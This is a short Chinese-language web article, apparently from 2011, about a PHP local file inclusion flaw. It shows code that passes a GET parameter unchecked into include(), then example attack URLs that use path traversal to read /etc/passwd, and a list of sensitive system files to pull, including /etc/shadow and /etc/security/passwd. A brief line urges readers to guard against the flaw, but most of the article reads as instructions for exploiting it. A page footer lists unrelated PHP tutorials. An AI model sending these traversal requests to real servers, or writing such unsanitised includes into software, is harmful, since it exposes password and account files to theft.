快捷導(dǎo)航

php 偽造本地文件包含漏洞的代碼

更新時(shí)間：2011年11月03日 23:33:36 作者：

php 偽造本地文件包含漏洞的代碼,大家一定要注意防范。

代碼:

 
<?php 
$page=$_GET['page']; 
include($page.'php'); 
?> 

你可以這樣使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

獲取更多數(shù)據(jù):
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

來(lái)自hackteach

您可能感興趣的文章:

包含漏洞

相關(guān)文章

php ActiveMQ的安裝與使用方法圖文教程
這篇文章主要介紹了php ActiveMQ的安裝與使用方法,結(jié)合圖文與實(shí)例形式分析了ActiveMQ的功能、安裝、使用方法及操作注意事項(xiàng),需要的朋友可以參考下
2020-02-02
解析php擴(kuò)展php_curl.dll不加載的解決方法
本篇文章是對(duì)php擴(kuò)展php_curl.dll不加載的解決方法進(jìn)行了詳細(xì)的分析介紹，需要的朋友參考下
2013-06-06
PHP生成制作驗(yàn)證碼的簡(jiǎn)單實(shí)例
下面小編就為大家?guī)?lái)一篇PHP生成制作驗(yàn)證碼的簡(jiǎn)單實(shí)例。小編覺(jué)得挺不錯(cuò)的，現(xiàn)在就分享給大家，也給大家做個(gè)參考。一起跟隨小編過(guò)來(lái)看看吧
2016-06-06
php5.3后靜態(tài)綁定用法詳解
這篇文章主要介紹了php5.3后靜態(tài)綁定用法,結(jié)合具體示例分析了php5.3開(kāi)始引入的后靜態(tài)綁定相關(guān)概念、功能、使用方法與注意事項(xiàng),并搜集了來(lái)自網(wǎng)友的典型分析說(shuō)明,需要的朋友可以參考下
2016-11-11
淺談PHP的exec()函數(shù)無(wú)返回值排查方法(必看)
下面小編就為大家?guī)?lái)一篇淺談PHP的exec()函數(shù)無(wú)返回值排查方法(必看)。小編覺(jué)得挺不錯(cuò)的，現(xiàn)在就分享給大家，也給大家做個(gè)參考。一起跟隨小編過(guò)來(lái)看看吧
2017-03-03
php復(fù)制文件后改名的實(shí)例代碼
在本篇文章里小編給大家整理的是一篇關(guān)于php復(fù)制文件后改名的方法及相關(guān)內(nèi)容，有興趣的朋友們可以學(xué)習(xí)下。
2021-09-09
PHP將整數(shù)數(shù)字轉(zhuǎn)換為羅馬數(shù)字實(shí)例分享
本篇文章中小編給大家分享了一篇關(guān)于PHP將整數(shù)數(shù)字轉(zhuǎn)換為羅馬數(shù)字的知識(shí)點(diǎn)以及實(shí)例內(nèi)容，需要的朋友們學(xué)習(xí)下。
2019-03-03
PHP中使用mktime獲取時(shí)間戳的一個(gè)黑色幽默分析
mktime(hour,minute,second,month,day,year,is_dst)這是mktime的語(yǔ)法說(shuō)明，一目了然應(yīng)該不難寫(xiě)出一個(gè)時(shí)間戳的代碼來(lái)
2012-05-05
php中explode與split的區(qū)別介紹
今天在使用split時(shí)遇到一些問(wèn)題。還是對(duì)函數(shù)理解不深刻，特寫(xiě)出來(lái)做個(gè)記號(hào)
2012-10-10
php 刪除一維數(shù)組中某一個(gè)值元素的操作方法
下面小編就為大家分享一篇php 刪除一維數(shù)組中某一個(gè)值元素的操作方法，具有很好的參考價(jià)值，希望對(duì)大家有所幫助。一起跟隨小編過(guò)來(lái)看看吧
2018-02-02